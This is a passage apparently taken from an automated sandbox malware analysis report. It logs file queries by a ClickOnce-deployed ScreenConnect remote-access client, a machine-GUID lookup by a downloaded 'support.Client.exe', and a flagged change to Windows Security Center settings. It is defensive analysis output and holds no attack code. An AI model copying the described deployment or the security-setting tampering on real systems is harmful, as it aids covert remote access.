              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Client.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Core.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Windows.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Core.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Core.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Windows.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Client.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Client.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Core.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Windows.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Client.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Core.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.Windows.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.dll VolumeInformation
              Source: C:\Users\user\Downloads\support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Changes security center settings (notifications, updates, antivirus, firewall)
              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
              Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
